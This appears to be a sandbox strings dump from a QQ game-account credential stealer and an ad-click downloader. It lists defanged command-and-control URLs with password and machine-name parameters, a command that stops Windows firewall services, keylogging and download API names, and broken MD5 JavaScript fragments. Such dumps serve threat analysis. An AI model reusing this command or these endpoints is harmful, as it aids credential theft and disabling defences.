2)%4))&255);for(var A=0;AD.length*32){F =b64pad}else{F =C.charAt((E>>6*(3-A))&63)}}}return F}function hexchar2bin(str){var arr=[];for(var i=0;i
var hexcase=1;var b64pad="";var chrsz=8;var mode=32;function md5(A){return hex_md5(A)}function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128>>9)16){E=core_md5(E,C.length*chrsz)}var A=Array(16),D=Array(16);for(var B=0;B>16) (D>>16) (C>>16);return(B>>(32-B))}function str2binl(D){var C=Array();var A=(1>5]|=(D.charCodeAt(B/chrsz)&A)>5]>>>(B2))&A)}return D}function binl2hex(C){var B=hexcase?"0123456789ABCDEF":"0123456789abcdef";var D="";for(var A=0;A>2]>>((A%4)*8 4))&15) B.charAt((C[A>>2]>>((A%4)*8))&15)}return D}function binl2b64(D){var C="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /";var F="";for(var B=0;B>2]>>8*(B%4))&255)>2]>>8*((B 1)%4))&255)>2]>>8*((B 2)%4))&255);for(var A=0;AD.length*32){F =b64pad}else{F =C.charAt((E>>6*(3-A))&63)}}}return F}function hexchar2bin(str){var arr=[];for(var i=0;i
GetPassword
GetPassword
hXXp://183.57.57.192:7890/QQ/qqswkg.txt
hXXp://183.57.57.192:7890/QQ/qqswkg.txt
hXXp://183.57.57.192:7890/QQ/qqsw.txt&appid=636014201&js_ver=10099&js_type=1&login_sig=323TOjfY38GbVwqlKxXqKdw*x*RnJtBXEtcjtf0CwU-izFSsCW1OnY5uOYgHv7Nx&u1=http://VVV.qq.com/qq2012/loginSuccess.htm&r=0.
hXXp://183.57.57.192:7890/QQ/qqsw.txt&appid=636014201&js_ver=10099&js_type=1&login_sig=323TOjfY38GbVwqlKxXqKdw*x*RnJtBXEtcjtf0CwU-izFSsCW1OnY5uOYgHv7Nx&u1=http://VVV.qq.com/qq2012/loginSuccess.htm&r=0.
hXXp://check.ptlogin2.qq.com/check?regmaster=&uin=
hXXp://check.ptlogin2.qq.com/check?regmaster=&uin=
qq.exe
qq.exe
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
VBScript.RegExp
VBScript.RegExp
LocationURL
LocationURL
Y@ExecuteStatement
Y@ExecuteStatement
wininet.dll
wininet.dll
WinINet.dll
WinINet.dll
urlmon
urlmon
kernel32.dll
kernel32.dll
ole32.dll
ole32.dll
user32.dll
user32.dll
gdi32.dll
gdi32.dll
oleaut32.dll
oleaut32.dll
atl.dll
atl.dll
shell32.dll
shell32.dll
User32.dll
User32.dll
ws2_32.dll
ws2_32.dll
msimg32.dll
msimg32.dll
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
URLDownloadToFileA
URLDownloadToFileA
GetAsyncKeyState
GetAsyncKeyState
GetProcessHeap
GetProcessHeap
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
program internal error number is %d.
program internal error number is %d.
:"%s"
:"%s"
:"%s".
:"%s".
1.1.3
1.1.3
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
KERNEL32.DLL
KERNEL32.DLL
ATL.DLL
ATL.DLL
GDI32.dll
GDI32.dll
MSIMG32.dll
MSIMG32.dll
MSVCRT.dll
MSVCRT.dll
OLEAUT32.dll
OLEAUT32.dll
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
Microsoft(R) Windows(R) Operating System
Microsoft(R) Windows(R) Operating System
5.2.3790.3959
5.2.3790.3959
install.exe
install.exe
FprqlspZxc.EXE_1288_rwx_00401000_000C4000:
f9z.vk
f9z.vk
cmd /c net stop alg /y&net stop sharedaccess
cmd /c net stop alg /y&net stop sharedaccess
hXXp://183.57.57.192:7890/QQ/QQfm.txt
hXXp://183.57.57.192:7890/QQ/QQfm.txt
smqqv0.6hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
smqqv0.6hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
http=
http=
HTTP/1.1
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXp://
hXXp://
hXXp://183.57.57.192:7890/QQ/dsm.txt&s_url=http://dnf.qq.com/act/a20090219dltb/&f_url=&ptlang=2052&ptredirect=101&aid=21000127&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0
hXXp://183.57.57.192:7890/QQ/dsm.txt&s_url=http://dnf.qq.com/act/a20090219dltb/&f_url=&ptlang=2052&ptredirect=101&aid=21000127&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0
&service=login&nodirect=0&ptsig=
&service=login&nodirect=0&ptsig=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
hXXp://183.57.57.192:7890/QQ/d2.txt&Beta=0.155&Ques=
hXXp://183.57.57.192:7890/QQ/d2.txt&Beta=0.155&Ques=
&Pass=
&Pass=
hXXp://183.57.57.192:7890/QQ/ljxiazaidizhi.txt
hXXp://183.57.57.192:7890/QQ/ljxiazaidizhi.txt
(7),01444
(7),01444
'9=82<.342>
'9=82<.342>
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=dnf&area=
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=dnf&area=
&msg=
&msg=
183.57.57.192
183.57.57.192
hXXp://183.61.164.199:989/grqif3/qq.asp
hXXp://183.61.164.199:989/grqif3/qq.asp
hXXp://captcha.qq.com/getimage?aid=11000101&uin=
hXXp://captcha.qq.com/getimage?aid=11000101&uin=
&_=139763802
&_=139763802
hXXp://my.pay.qq.com/cgi-bin/account/ajax_query.cgi?cmd=31&extcode=
hXXp://my.pay.qq.com/cgi-bin/account/ajax_query.cgi?cmd=31&extcode=
Adodb.Stream
Adodb.Stream
@hXXp://aq.qq.com/cn2/index
@hXXp://aq.qq.com/cn2/index
hXXp://my.pay.qq.com/cgi-bin/personal/balance_query_sortflow.cgi?t=0.
hXXp://my.pay.qq.com/cgi-bin/personal/balance_query_sortflow.cgi?t=0.
hXXp://183.57.57.192:7890/QQ/QQh.txt
hXXp://183.57.57.192:7890/QQ/QQh.txt
hXXp://183.57.57.192:7890/QQ/hmsx2.txt&aid=21000127&u1=http://dnf.qq.com/act/a20090219dltb/&h=1&ptredirect=1&ptlang=2052&daid=8&from_ui=1&dumy=&low_login_enable=0®master=&fp=loginerroralert&action=16-116-1389436820937&mibao_css=&t=2&g=1&js_ver=10063&js_type=1&login_sig=knHhTNFwQthq*GSFdpsyF6EaS8*jMteBFqJBsJiCmMR8bkYQuLD6LJlF-7k4h0Qx&pt_rsa=0
hXXp://183.57.57.192:7890/QQ/hmsx2.txt&aid=21000127&u1=http://dnf.qq.com/act/a20090219dltb/&h=1&ptredirect=1&ptlang=2052&daid=8&from_ui=1&dumy=&low_login_enable=0®master=&fp=loginerroralert&action=16-116-1389436820937&mibao_css=&t=2&g=1&js_ver=10063&js_type=1&login_sig=knHhTNFwQthq*GSFdpsyF6EaS8*jMteBFqJBsJiCmMR8bkYQuLD6LJlF-7k4h0Qx&pt_rsa=0
hXXp://ptlogin2.qq.com/login?u=
hXXp://ptlogin2.qq.com/login?u=
hXXp://ui.ptlogin2.qq.com/cgi-bin/mibao_vry
hXXp://ui.ptlogin2.qq.com/cgi-bin/mibao_vry
hXXp://aq.qq.com/cn/services/abnormal/abnormal_index
hXXp://aq.qq.com/cn/services/abnormal/abnormal_index
&s_url
&s_url
var hexcase=1;var b64pad="";var chrsz=8;var mode=32;function md5(A){return hex_md5(A)}function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128>>9)16){E=core_md5(E,C.length*chrsz)}var A=Array(16),D=Array(16);for(var B=0;B>16) (D>>16) (C>>16);return(B>>(32-B))}function str2binl(D){var C=Array();var A=(1>5]|=(D.charCodeAt(B/chrsz)&A)>5]>>>(B2))&A)}return D}function binl2hex(C){var B=hexcase?"0123456789ABCDEF":"0123456789abcdef";var D="";for(var A=0;A>2]>>((A%4)*8 4))&15) B.charAt((C[A>>2]>>((A%4)*8))&15)}return D}function binl2b64(D){var C="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /";var F="";for(var B=0;B>2]>>8*(B%4))&255)>2]>>8*((B 1)%4))&255)>2]>>8*((B 2)%4))&255);for(var A=0;AD.length*32){F =b64pad}else{F =C.charAt((E>>6*(3-A))&63)}}}return F}function hexchar2bin(str){var arr=[];for(var i=0;i
var hexcase=1;var b64pad="";var chrsz=8;var mode=32;function md5(A){return hex_md5(A)}function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function str_md5(A){return binl2str(core_md5(str2binl(A),A.length*chrsz))}function hex_hmac_md5(A,B){return binl2hex(core_hmac_md5(A,B))}function b64_hmac_md5(A,B){return binl2b64(core_hmac_md5(A,B))}function str_hmac_md5(A,B){return binl2str(core_hmac_md5(A,B))}function core_md5(K,F){K[F>>5]|=128>>9)16){E=core_md5(E,C.length*chrsz)}var A=Array(16),D=Array(16);for(var B=0;B>16) (D>>16) (C>>16);return(B>>(32-B))}function str2binl(D){var C=Array();var A=(1>5]|=(D.charCodeAt(B/chrsz)&A)>5]>>>(B2))&A)}return D}function binl2hex(C){var B=hexcase?"0123456789ABCDEF":"0123456789abcdef";var D="";for(var A=0;A>2]>>((A%4)*8 4))&15) B.charAt((C[A>>2]>>((A%4)*8))&15)}return D}function binl2b64(D){var C="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /";var F="";for(var B=0;B>2]>>8*(B%4))&255)>2]>>8*((B 1)%4))&255)>2]>>8*((B 2)%4))&255);for(var A=0;AD.length*32){F =b64pad}else{F =C.charAt((E>>6*(3-A))&63)}}}return F}function hexchar2bin(str){var arr=[];for(var i=0;i
GetPassword
GetPassword
hXXp://183.57.57.192:7890/QQ/qqswkg.txt
hXXp://183.57.57.192:7890/QQ/qqswkg.txt
hXXp://183.57.57.192:7890/QQ/qqsw.txt&appid=636014201&js_ver=10099&js_type=1&login_sig=323TOjfY38GbVwqlKxXqKdw*x*RnJtBXEtcjtf0CwU-izFSsCW1OnY5uOYgHv7Nx&u1=http://VVV.qq.com/qq2012/loginSuccess.htm&r=0.
hXXp://183.57.57.192:7890/QQ/qqsw.txt&appid=636014201&js_ver=10099&js_type=1&login_sig=323TOjfY38GbVwqlKxXqKdw*x*RnJtBXEtcjtf0CwU-izFSsCW1OnY5uOYgHv7Nx&u1=http://VVV.qq.com/qq2012/loginSuccess.htm&r=0.
hXXp://check.ptlogin2.qq.com/check?regmaster=&uin=
hXXp://check.ptlogin2.qq.com/check?regmaster=&uin=
qq.exe
qq.exe
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
VBScript.RegExp
VBScript.RegExp
LocationURL
LocationURL
Y@ExecuteStatement
Y@ExecuteStatement
wininet.dll
wininet.dll
WinINet.dll
WinINet.dll
urlmon
urlmon
kernel32.dll
kernel32.dll
ole32.dll
ole32.dll
user32.dll
user32.dll
gdi32.dll
gdi32.dll
oleaut32.dll
oleaut32.dll
atl.dll
atl.dll
shell32.dll
shell32.dll
User32.dll
User32.dll
ws2_32.dll
ws2_32.dll
msimg32.dll
msimg32.dll
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
URLDownloadToFileA
URLDownloadToFileA
GetAsyncKeyState
GetAsyncKeyState
GetProcessHeap
GetProcessHeap
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
program internal error number is %d.
program internal error number is %d.
:"%s"
:"%s"
:"%s".
:"%s".
1.1.3
1.1.3
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
CqxpeonGez.EXE_904:
`.rsrc
`.rsrc
tGHt.Ht&
tGHt.Ht&
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
svchost.exe
svchost.exe
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
X-X-X-X-X-X
X-X-X-X-X-X
F:\ProjectCode\Downloader\WQDL\Release\Downloader.pdb
F:\ProjectCode\Downloader\WQDL\Release\Downloader.pdb
%System%
%System%
xxxooo1.exe
xxxooo1.exe
121.12.170.42
121.12.170.42
hXXp://121.12.115.213:1024/
hXXp://121.12.115.213:1024/
hXXp://VVV.hao123.com/?tn=39005018_470_hao_pg
hXXp://VVV.hao123.com/?tn=39005018_470_hao_pg
.?AVCTCPClient_FT@@
.?AVCTCPClient_FT@@
.?AVCXWebBrowser@@
.?AVCXWebBrowser@@
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
hXXp://VVV.it885.com.cn/web/
hXXp://VVV.it885.com.cn/web/
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
KERNEL32.dll
KERNEL32.dll
EnumChildWindows
EnumChildWindows
EnumDesktopWindows
EnumDesktopWindows
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
WS2_32.dll
WS2_32.dll
GetCPInfo
GetCPInfo
360try_dll.dll
360try_dll.dll
GET %s HTTP/1.1
GET %s HTTP/1.1
Referer: %s
Referer: %s
Accept-Language: %s
Accept-Language: %s
User-Agent: %s
User-Agent: %s
Host: %s
Host: %s
Cookie: %s
Cookie: %s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
%s-%x
%s-%x
%%X
%%X
%s "%s"
%s "%s"
Applications\iexplore.exe\shell\open\command
Applications\iexplore.exe\shell\open\command
error find windows
error find windows
uRlp
uRlp
n%c$Eo!y
n%c$Eo!y
.OVWc
.OVWc
.IL([
.IL([
p%u7V
p%u7V
Bu.hh3
Bu.hh3
2%ScG
2%ScG
%u;)C&>
%u;)C&>
G6C.kwFt
G6C.kwFt
v#%I%f
v#%I%f
R.LsX
R.LsX
%5SLY
%5SLY
PF.gc g
PF.gc g
File%d
File%d
PMsg
PMsg
j.DLL7(
j.DLL7(
v%*.*
v%*.*
asss>X-
asss>X-
Supported
Supported
pen6execJw
pen6execJw
{CTED/MSVCRT_P
{CTED/MSVCRT_P
b.do5p
b.do5p
a,&.xml
a,&.xml
valucmdn0epy
valucmdn0epy
=\/?!>
=\/?!>
0p.Dl7;d
0p.Dl7;d
zcÃ
zcÃ
%XB ]CG
%XB ]CG
OKey
OKey
aTUrlMkSO3
aTUrlMkSO3
=iM.Mj(
=iM.Mj(
KERNEL32.DLL
KERNEL32.DLL
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
OLEPRO32.DLL
OLEPRO32.DLL
urlmon.dll
urlmon.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
WSOCK32.dll
WSOCK32.dll
RegOpenKeyA
RegOpenKeyA
UrlMkSetSessionOption
UrlMkSetSessionOption
svchost.exe
svchost.exe
IEXPLORE.EXE
IEXPLORE.EXE
%srunpage.asp
%srunpage.asp
%s%s&machinename=%s&cr=yes
%s%s&machinename=%s&cr=yes
get_ad4.asp?type=loadall
get_ad4.asp?type=loadall
EndViewRun.dll
EndViewRun.dll
OneClickRun.dll
OneClickRun.dll
Wsock3.dll
Wsock3.dll
NoViewRun2.dll
NoViewRun2.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
%System%\l3codeca.acm
%System%\l3codeca.acm
msacm32.drv
msacm32.drv
%sclick_log2.asp?ad_url=%s&cr=yes
%sclick_log2.asp?ad_url=%s&cr=yes
%s\%s
%s\%s
2!2'2-282@2
2!2'2-282@2
FtPh
FtPh
MEK%C
MEK%C
3MHL.TX
3MHL.TX
-c.YY,
-c.YY,
.kIIlzx
.kIIlzx
Q{.UPC
Q{.UPC
.INC`*K@
.INC`*K@
5.Sw,5
5.Sw,5
6%F;%2
6%F;%2
Wu.ou
Wu.ou
T.Zfl
T.Zfl
'pen,inmm.dll
'pen,inmm.dll
Z7i.ctSoundCB
Z7i.ctSoundCB
`Us.32.DLV%d
`Us.32.DLV%d
a.asp
a.asp
%^&*()_
%^&*()_
=xzgWEBe B
=xzgWEBe B
.Sa3X
.Sa3X
.toLowerCase()x
.toLowerCase()x
O1.rwdns
O1.rwdns
\C2.jV
\C2.jV
zl.oc#l76~wx
zl.oc#l76~wx
Msgw
Msgw
FgNotSupportedQ
FgNotSupportedQ
sHTTP
sHTTP
:7pr.ocol\
:7pr.ocol\
d.xB;
d.xB;
mG.iG8
mG.iG8
_C.dG
_C.dG
zwsp.fQ
zwsp.fQ
SHLWAPI.dll
SHLWAPI.dll
RegEnumKeyA
RegEnumKeyA
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
GetConsoleOutputCP
GetConsoleOutputCP
NETAPI32.dll
NETAPI32.dll
PSAPI.DLL
PSAPI.DLL
mscoree.dll
mscoree.dll
1, 0, 0, 0
1, 0, 0, 0
AuotIE.exe
AuotIE.exe
AutoIE.exe
AutoIE.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
Access to %1 was denied..An invalid file handle was associated with %1.
Access to %1 was denied..An invalid file handle was associated with %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
1.0.0.1
1.0.0.1
Client.exe
Client.exe
CqxpeonGez.EXE_904_rwx_00401000_00086000:
tGHt.Ht&
tGHt.Ht&
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
operator
operator
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
svchost.exe
svchost.exe
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
X-X-X-X-X-X
X-X-X-X-X-X
F:\ProjectCode\Downloader\WQDL\Release\Downloader.pdb
F:\ProjectCode\Downloader\WQDL\Release\Downloader.pdb
%System%
%System%
xxxooo1.exe
xxxooo1.exe
121.12.170.42
121.12.170.42
hXXp://121.12.115.213:1024/
hXXp://121.12.115.213:1024/
hXXp://VVV.hao123.com/?tn=39005018_470_hao_pg
hXXp://VVV.hao123.com/?tn=39005018_470_hao_pg
.?AVCTCPClient_FT@@
.?AVCTCPClient_FT@@
.?AVCXWebBrowser@@
.?AVCXWebBrowser@@
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE
%Documents and Settings%\All Users\Application Data\DownloadSave\CqxpeonGez.EXE
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
hXXp://VVV.it885.com.cn/web/
hXXp://VVV.it885.com.cn/web/
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
KERNEL32.dll
KERNEL32.dll
EnumChildWindows
EnumChildWindows
EnumDesktopWindows
EnumDesktopWindows
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
WS2_32.dll
WS2_32.dll
GetCPInfo
GetCPInfo
360try_dll.dll
360try_dll.dll
GET %s HTTP/1.1
GET %s HTTP/1.1
Referer: %s
Referer: %s
Accept-Language: %s
Accept-Language: %s
User-Agent: %s
User-Agent: %s
Host: %s
Host: %s
Cookie: %s
Cookie: %s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
%s-%x
%s-%x
%%X
%%X
%s "%s"
%s "%s"
Applications\iexplore.exe\shell\open\command
Applications\iexplore.exe\shell\open\command
error find windows
error find windows
uRlp
uRlp
n%c$Eo!y
n%c$Eo!y
.OVWc
.OVWc
.IL([
.IL([
p%u7V
p%u7V
Bu.hh3
Bu.hh3
2%ScG
2%ScG
%u;)C&>
%u;)C&>
G6C.kwFt
G6C.kwFt
v#%I%f
v#%I%f
R.LsX
R.LsX
%5SLY
%5SLY
PF.gc g
PF.gc g
File%d
File%d
PMsg
PMsg
j.DLL7(
j.DLL7(
v%*.*
v%*.*
asss>X-
asss>X-
Supported
Supported
pen6execJw
pen6execJw
{CTED/MSVCRT_P
{CTED/MSVCRT_P
b.do5p
b.do5p
a,&.xml
a,&.xml
valucmdn0epy
valucmdn0epy
=\/?!>
=\/?!>
0p.Dl7;d
0p.Dl7;d
zcÃ
zcÃ
%XB ]CG
%XB ]CG
OKey
OKey
aTUrlMkSO3
aTUrlMkSO3
=iM.Mj(
=iM.Mj(
KERNEL32.DLL
KERNEL32.DLL
COMCTL32.dll
COMCTL32.dll
comdlg32.dll
comdlg32.dll
GDI32.dll
GDI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
OLEPRO32.DLL
OLEPRO32.DLL
urlmon.dll
urlmon.dll
WININET.dll
WININET.dll
WINMM.dll
WINMM.dll
WINSPOOL.DRV
WINSPOOL.DRV
WSOCK32.dll
WSOCK32.dll
RegOpenKeyA
RegOpenKeyA
UrlMkSetSessionOption
UrlMkSetSessionOption
svchost.exe
svchost.exe
IEXPLORE.EXE
IEXPLORE.EXE
%srunpage.asp
%srunpage.asp
%s%s&machinename=%s&cr=yes
%s%s&machinename=%s&cr=yes
get_ad4.asp?type=loadall
get_ad4.asp?type=loadall
EndViewRun.dll
EndViewRun.dll
OneClickRun.dll
OneClickRun.dll
Wsock3.dll
Wsock3.dll
NoViewRun2.dll
NoViewRun2.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
%System%\l3codeca.acm
%System%\l3codeca.acm
msacm32.drv
msacm32.drv
%sclick_log2.asp?ad_url=%s&cr=yes
%sclick_log2.asp?ad_url=%s&cr=yes
%s\%s
%s\%s
2!2'2-282@2
2!2'2-282@2
FtPh
FtPh
MEK%C
MEK%C
3MHL.TX
3MHL.TX
-c.YY,
-c.YY,
.kIIlzx
.kIIlzx
Q{.UPC
Q{.UPC
.INC`*K@
.INC`*K@
5.Sw,5
5.Sw,5
6%F;%2
6%F;%2
Wu.ou
Wu.ou
T.Zfl
T.Zfl
'pen,inmm.dll
'pen,inmm.dll
Z7i.ctSoundCB
Z7i.ctSoundCB
`Us.32.DLV%d
`Us.32.DLV%d
a.asp
a.asp
%^&*()_
%^&*()_
=xzgWEBe B
=xzgWEBe B
.Sa3X
.Sa3X
.toLowerCase()x
.toLowerCase()x
O1.rwdns
O1.rwdns
\C2.jV
\C2.jV
zl.oc#l76~wx
zl.oc#l76~wx
Msgw
Msgw
FgNotSupportedQ
FgNotSupportedQ
sHTTP
sHTTP
:7pr.ocol\
:7pr.ocol\
d.xB;
d.xB;
mG.iG8
mG.iG8
_C.dG
_C.dG
zwsp.fQ
zwsp.fQ
SHLWAPI.dll
SHLWAPI.dll
RegEnumKeyA
RegEnumKeyA
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
GetConsoleOutputCP
GetConsoleOutputCP
mscoree.dll
mscoree.dll
1, 0, 0, 0
1, 0, 0, 0
AuotIE.exe
AuotIE.exe
AutoIE.exe
AutoIE.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
All Files (*.*)
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
#Unable to load mail system support.
#Unable to load mail system support.
Access to %1 was denied..An invalid file handle was associated with %1.
Access to %1 was denied..An invalid file handle was associated with %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
1.0.0.1
1.0.0.1
Client.exe
Client.exe
svchost.exe_232:
`.rsrc
`.rsrc
FtPh
FtPh
t.Ht4
t.Ht4
Winmm.dll
Winmm.dll
DSound.dll
DSound.dll
